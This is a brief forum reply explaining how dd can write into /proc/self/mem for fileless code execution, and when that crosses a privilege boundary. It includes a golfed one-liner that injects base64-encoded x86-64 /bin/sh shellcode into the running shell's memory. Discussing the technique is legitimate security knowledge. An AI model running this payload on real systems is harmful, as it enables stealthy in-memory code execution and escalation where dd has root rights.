Woah - can you expand on this a bit? I don't have a system to test atm, but I'm curious how that works. Are you sure privileges/security boundaries are circumvented?
It only really crosses a security boundary if, for some reason, dd is configured to run as root (e.g. via setuid bit, or sudo config). At that point, you could use it to patch the filesystem directly anyway, but keeping things in-memory is much stealthier (and less risk of bricking hardware, if your working with an embedded device or similar).
For a description of using dd to gain file-less native code execution, see [2].
As a concise (golfed) example (x86-64 /bin/sh shellcode):
cd /*/$$;read a<*l;exec 3>mem;base64 -d<<<McBIu9GdlpHQjJf/SPfbU1RfmVJXVF6wOw8F|dd bs=1 seek=$[`cut -d\ -f9<<<$a`]>&3
Source: [3][1] https://www.kernel.org/doc/Documentation/security/Yama.txt
[2] https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md
[3] https://twitter.com/David3141593/status/1386678449604108289